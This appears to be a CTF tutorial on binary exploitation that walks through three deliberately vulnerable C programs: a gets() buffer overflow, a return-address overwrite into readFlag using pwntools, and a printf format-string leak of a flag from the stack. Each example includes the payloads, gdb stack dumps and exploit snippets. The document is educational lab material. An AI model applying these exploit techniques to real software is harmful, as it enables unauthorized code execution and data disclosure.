Binary Exploitation

Binary Exploitation is one of the core categories in CTF competitions that involves finding and exploiting vulnerabilities in compiled programs to gain unauthorized access or execute arbitrary code.

Tools You'll Need

  • GDB with extensions: Use pwndbg/gdb-peda/gef to get better view
  • pwntools module: Essential Python library for exploit development

Example 1: Buffer Overflow (bof0)

Given the problem in example1.c:

c
void readFlag() { char flag[32]; FILE *fptr; fptr = fopen("flag.txt", "r"); fread(&flag, sizeof(char), 32, fptr); puts(flag); } void vuln() { char input[8]; char string[8] = "UwU"; printf("your input: "); gets(input); printf("string is: %s\n", string); if(strcmp(string, ">w<") == 0) { puts("congrats! here's your flag"); readFlag(); } else { printf("not yet :(\nkeep trying!\n"); } } int main() { setbuf(stdout, NULL); puts("hi! change the string to >w< and you'll get your flag!"); vuln(); return 0; }

Analysis

If you look closely it has gets function, it didn't specify the buffer size, so we can overflow it.

You can check the manual page of gets function with:

bash
man gets

The manual page says:

gets() reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a null byte ('\0'). No check for buffer overrun is performed

Finding the Offset

If we run the binary with ./example1 we will get:

text
hi! change the string to >w< and you'll get your flag! your input:

You can try to brute force it by using:

bash
pwn cyclic 16 # Output: aaaabaaacaaadaaa

Or pattern create in gef. For example:

bash
pwn cyclic 16 aaaabaaacaaadaaa

If we input it to the system we will get:

text
hi! change the string to >w< and you'll get your flag! your input: aaaabaaacaaadaaa string is: caaadaaa not yet :( keep trying!

Exploitation

If we examine carefully, we have overwritten the string[8] with our input. Because the size of input variable is 8 bytes, if we supply the gets with more than 8 character it will overflow. In this case it will overflowing string[8].

So the input has to be 8*randomcharacter + >w<. Let's just use A for the padding. So the payload will be:

text
AAAAAAAA>w<

Supply the payload in the binary and we got the flag.

Flag: CTF{buffer_overflo0o0o0ow}

Example 2: Return Address Overwrite (b0f1.c)

Given the problem in example2.c:

c
void readFlag() { char flag[32]; FILE *fptr; fptr = fopen("flag.txt", "r"); fread(&flag, sizeof(char), 32, fptr); puts(flag); } void vuln() { char string[8] = "UwU"; char input[8]; printf("your input: "); gets(input); printf("string is: %s\n", string); if(strcmp(string, ">w<") == 0) { puts("so what?"); } else { printf("not yet :(\nkeep trying!\n"); } } int main() { setbuf(stdout, NULL); puts("hi! change the string to >w< and we'll see what happens!"); vuln(); return 0; }

Analysis

If we look carefully there are readFlag function that read and also puts the flag. But in main function we didn't call readFlag at all, we only call vuln. So how to execute the readFlag function without having in the main function?

vuln function still use gets, meaning it's not safe, it's pwnable so we can exploit that and overwrite the return address of vuln function to readFlag function.

Finding Function Addresses

You can use decompiler or gdb to examine the function. Let's use the default which is gdb and other default tools.

bash
readelf -s ./example2

To display all functions. Look for:

bash
66: 00000000004006d7 75 FUNC GLOBAL DEFAULT 13 readFlag

readFlag address: 00000000004006d7

Debugging with GDB

We need to find insert breakpoint before and after we input to examine the stack:

bash
gdb ./example

To run the gdb. Because our input in the vuln function we can disassemble vuln:

bash
disas vuln

Let's insert breakpoint at 0x000000000040074a and 0x0000000000400754:

bash
b*0x000000000040074a # Breakpoint 1 at 0x40074a b*0x0000000000400754 # Breakpoint 2 at 0x400754

Hit r after we insert breakpoint to run the gdb.

Stack Analysis

Before input:

bash
stack 0x00007fffffffdac0│+0x0000: 0x00000000004005f0 → <_start+0> xor ebp, ebp ← $rax, $rsp, $rdi 0x00007fffffffdac8│+0x0008: 0x0000000000557755 ("UwU"?) 0x00007fffffffdad0│+0x0010: 0x00007fffffffdae0 → 0x0000000000000000 ← $rbp 0x00007fffffffdad8│+0x0018: 0x00000000004007ce → <main+46> mov eax, 0x0

If we look at the stack before input, the rip points to the return address of the vuln function. To run the readFlag function we must replace 0x000000000040074a by readFlag address.

Finding the Offset

So try to use the cyclic or pattern create in gef to find the offset:

bash
pattern create 24 aaaabaaacaaadaaaeaaafaaa

After input:

bash
stack 0x00007fffffffdac0│+0x0000: "aaaabaaacaaadaaaeaaafaaa"$rax, $rsp, $r8 0x00007fffffffdac8│+0x0008: "caaadaaaeaaafaaa" 0x00007fffffffdad0│+0x0010: "eaaafaaa"$rbp 0x00007fffffffdad8│+0x0018: 0x0000000000400700 → <readFlag+41>

Before input $rip: 0x40074a, now $rip: 0x400700. We have successfully changed from 4a to 00.

Creating the Payload

To change to little endian form you can use pwntool:

python
>>> import pwn >>> pwn.p64(0x00000000004006d7) b'\xd7\x06@\x00\x00\x00\x00\x00'

Our payload is non-printable character so how can we arrange it?

You can use either:

bash
python -c "print('A'*24 + '\xd7\x06@\x00\x00\x00\x00\x00')" | ./example1

Or using pwntools:

python
offset = 24 readFlag = 0x00000000004006d7 payload = b'A' * offset payload += p64(readFlag) # Use p.sendline(payload) # p.interactive()

To send the payload and enter interactive mode and you'll get the flag.

Flag: CTF{ch4ng3_th3_progr4m_fl0o0w}

Example 3: Format String Vulnerability (fstr0)

Given the problem in example3.c:

c
// gcc fstr0.c -o fstr0 #include <stdio.h> #include <stdlib.h> #include <string.h> void readFlag(char* flag) { FILE *fptr; fptr = fopen("flag.txt", "r"); fread(flag, sizeof(char), 32, fptr); } void vuln() { char flag[32]; char name[256]; readFlag(flag); puts("what's your name?"); fgets(name, 256, stdin); printf("hello, "); printf(name); } int main() { setbuf(stdout, NULL); puts("hi, welcome to fstring!"); vuln(); return 0; }

Analysis

As we can see the input is sanitized by using fgets, it only accepts characters so we cannot buffer overflow it. But if we look more closely, at the last line of vuln function there is printf(name);.

F in printf stands for formatting. It can format our variable with our desired format.

For example:

c
printf("%d %d %d %d %d", 1, 2, 3, 4, 5); // will output: 1 2 3 4 5

We can also specify our desired format with %n$... for example:

c
printf("%2$d %1$d %3$d %5$d %4$d", 1, 2, 3, 4, 5); // will output : 2 1 3 5 4

Format String Exploitation

See the difference? So how can we exploit the formatting string. If we didn't specify any formatting in printf we can exploit it by using the format string itself. Wait whattt? How?

Because the printf didn't specify any formatting we can use for example: %x to print hexadecimal number but what hexadecimal would the printf print? Because we input %x, the printf think that it needs hexadecimal number and it will grab one from the stack itself. If we put %x %x %x %x %x it will grab 5 hexadecimal from the stack because we didn't give the printf function to print to.

If we run the binary it will ask for input and if we use %p %p %p %p %p:

text
hi, welcome to fstring! what's your name? %x %x %x %x %x hello, 0x7ffc01c289e0 0x7fdebadae8c0 (nil) 0x7 (nil)

As you can see it will output random value from the stack. If we look carefully the readFlag function is inside the vuln function itself so the flag must be in the stack, so we just need to find where the flag is. We can use %x or %p or even %ld:

text
hi, welcome to fstring! what's your name? %p %p %p %p %p %p %p %p %p %p hello, 0x7fff91459780 0x7fb7ed9758c0 (nil) 0x7 (nil) 0x5f6573757b465443 0x635f66746e697270 0x796c6c7566657261 0x7f7d7a6c705f 0x7025207025207025

Run the function again 1 more time:

text
hi, welcome to fstring! what's your name? %p %p %p %p %p %p %p %p %p %p hello, 0x7ffc069220b0 0x7f9093e858c0 (nil) 0x7 (nil) 0x5f6573757b465443 0x635f66746e697270 0x796c6c7566657261 0x7f7d7a6c705f 0x7025207025207025

ASLR and PIE

As you can see the first and second output is different. This happens because the ASLR is active. ASLR stands for Address Space Layout Randomization or we can use checksec to check it:

bash
checksec example2 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled

PIE (Position Independent Executable) we can see the same as ASLR so it will make our function have offset so it will behave differently every time. But as you can see the 6th address is the same, so maybe this is the flag?

Extracting the Flag

Convert this to ASCII:

  • 0x5f6573757b465443
  • 0x635f66746e697270
  • 0x796c6c7566657261
  • 0x7f7d7a6c705f

Using Python we get _esu{FTCc_ftnirpyllufera}zlp_ - it looks like the flag but reversed!

Remember our machine uses little endian so we must reverse the byte itself to get the correct flag. After we reverse it we get the flag:

python
flag = "0x5f6573757b465443-0x635f66746e697270-0x796c6c7566657261-0x7f7d7a6c705f" arrflag = flag.split("-") ans = b'' for item in arrflag: ans += p64(int(item, 16)) print(ans.decode())

And we get our desired flag.

Flag: CTF{use_printf_carefully_plz}